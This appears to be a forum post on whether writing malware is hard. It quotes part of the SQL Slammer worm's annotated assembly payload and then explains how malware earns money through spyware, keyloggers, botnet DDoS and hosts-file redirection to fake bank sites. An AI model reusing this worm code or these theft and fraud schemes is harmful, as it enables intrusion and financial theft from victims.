I wouldn't say the true hackers create the viruses. They're not hard to create. -sanddbox

Malware is fairly simpler to develop than a simple game =P. -DamegedSpy

I'm sorry, but I've got to disagree with the both of you. Making a virus, especially these days, is a very difficult operation. You've got to understand how to cause buffer overflows on windows system processes, you've got to attach your dlls to the windows processes like smss and winlogon, you've got to write your virus to be able to get around the giants like Norton and Macafee, and you've got to do all of this almost exclusively in assembly!

This is the shortest/smallest virus I could find. The Slammer worm. Yeah, that looks like it's super easy to code!

push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp mov eax, 1010101h ; ; Reconstruct session, after the overflow the payload buffer ; gets corrupted during program execution but before the ; payload is executed. The worm writer rebuilds the buffer ; so he can later resend it in the sendto() loop. xor ecx, ecx mov cl, 18h

fixup_payload: push eax loop fixup_payload xor eax, 5010101h ; 0x1010101 xor 0x5010101 = 0x04000000 (msg_type for sql resoloution request) ; ; 0x04 is the msg type for request, he has no rebuilt the payload ; so it can be fired over the wire later and reinfect. push eax mov ebp, esp ; ; Move esp into ebp. This will allow him to reference data ; pushed onto the stack later using ebp. He could use esp ; also except for the fact that he push's a lot of values and ; an esp offset will not as reliable. So he chose ebp... ; push ecx ; ; During this phase a series of strings and terminating ; nulls are pushed onto the stack. This method is common ; in simple exploits that don't require a large amount of ; imports to operate. It should also noted that the worm ; use’s the ecx register to store nulls, after it is ; decremented to zero from the loop routine. ; push 6C6C642Eh push 32336C65h push 6E72656Bh ; Push string kernel32.dll push ecx push 746E756Fh ; Push string GetTickCount push 436B6369h push 54746547h mov cx, 6C6Ch push ecx push 642E3233h ; Push string ws2_32.dll push 5F327377h mov cx, 7465h push ecx push 6B636F73h ; Push string socket mov cx, 6F74h push ecx push 646E6573h ; Push string sendto ; mov esi, 42AE1018h ; sqlsort.dll->IAT entry for LoadLibrary ; ; The worm writer uses the sqlsort IAT to locate ; the entry points for LoadLibrary and GetProcAddress.

; lea eax, [ebp-2Ch] ; Load address of string "ws2_32.dll" into eax and ; supply as an argument to LoadLibrary. push eax call dword ptr [esi] ; call sqlsort:[IAT]->LoadLibrary("ws2_32.dll") ; push eax ; When LoadLibrary returns, the base of ws2_32 is in eax. ; This will be used later for a GetProcAddress so he saves ; it on the stack using a push.. ; lea eax, [ebp-20h] ; Load address of string "GetTickCount" into eax and ; push it on the stack. This will be used as an argument ; to the GetProcAddress call after the next LoadLibrary call. push eax lea eax, [ebp-10h] ; Load address of string "kernel32.dll" into eax push eax call dword ptr [esi] ; call sqlsort:[IAT]->LoadLibrary("kernel32.dll") ; push eax ; When LoadLibrary returns, the base of kernel32 is in eax. ; This will be used later for a GetProcAddress so he saves ; it on the stack using a push.. ; mov esi, 42AE1010h ; Move sqlsort:[IAT] entry into esi. The IAT, or Import Address ; Table will shift across dll versions so the worm writer checks a ; small instruction sequence at the entry point of the function to ; verify that it is in fact, GetProcAddress. ; ; mov ebx, [esi] ; Move IAT entry (function entry point) into ebx. ; mov eax, [ebx] ; Move 4 bytes of instructions from function entry point into eax. ; cmp eax, 51EC8B55h ; Check entry point fingerprint for getprocaddress, if the compare fails he uses ; an assumed IATentry. So he checks the entry, if it's not GetProcAddress he ; assumes it's an alternate dll version and uses the static entry in that assumed ; dll version. ; ; The library version I have is:2000.80.534.0. This dll version hips with a base ; installation of MSSQL server 2000. The IATwith this DLL is an entry point for ; RtlEnterCriticalSection, so the first check will obviously fail and the jz will ; not succeed. ; ; It is undetermined what dll versions this payload will succeed on. Due to ; the "if not, then other" importing scheme, this may not work across all dll ; versions. ; ; jz short FOUND_IT ; GetProcAddress(kernel32_base,GetTickCount) mov esi, 42AE101Ch ; This point is only reached if the previous test failed. On a ; default install of MSSQL Server 2000, we will reach this point. ; Then next assignment will assign esi the sqlsort.dll->IAT entry ; for GetProcAddress.

Anyone able to produce a successful virus these days meets the criteria for being deemed a hacker IMHO. -tgoe

I would tend to agree. They may not be a very nice hacker, and they may totally f*** some people up, but they most definitively are hackers.

------------------------------------------NOW, with respect to making money from malware, it's really very simple. This may have been addressed on the page that defience posted a link to, I don't know, I didn't read it. Either way, there are two (possibly three) big ways to make money from malware. Spyware, programs that sit on your system and watch your browsing/computing habits is big money. Companies will pay for information on what consumers are doing on their computers, especially groups like advertising companies. MywebSearch makes bajillions of dollars by simply watching what you search for and every page you view, and sending the data to their "partners" who then use that data to target you with advertising and all of the whatnot that goes along with that.

Another big bucks malware making strategy is the obvious: making malware to steal your personal information. Many viruses will sit on your system and employ keyloggers or packet sniffers to catch your login information for your work, your bank, and your credit card's sites. They will also sometimes simply search your drive for saved credit card numbers, or also employ the keyloggers to pick up you card number, expiration date, social security number, address, name, mother's maiden name . . . well, you get the idea.

The third way of making money from malware is kind of abstract (not sure if that's quite the right word). Essentially though, the baddies can get their virus on tons of people's computers to make a huge botnet that they can control all by themselves. They can then use this botnet for whatever they want, for example carrying out a DDoS on a server they want to take down. Historically this hasn't really been used for profit, the chineese and the north koreans wrote viruses to bring down windowsupdate.microsoft.com, whitehouse.gov and I believe some of the pentagon's server's. This could presumably be used, if you're selling something online, to bring down your competitor's website.

Also, something I just remembered while I was typing this but was too lazy to properly insert into the appropriate paragraphs: Again if you're selling something or you want people going to your website, you can implement browser hijacks or put entries into the hosts file to point people to your website when they go to competitorwebsite.com. On that note with respect to stealing credit card information, you could use the same tactic to perform in essence, some sort of phishing. You use a Browser Helper Object malware app, or something that writes to the hosts file to point the victim to your imitation of the banks/credit cards/online store's website and simply capture the information as they foolishly send you all of their personal data.

So . . . that's pretty much it in a nutshell. You can make money off of malware by using it to get credit card numbers, or to sell people's computer usage habits to advertisers. FUN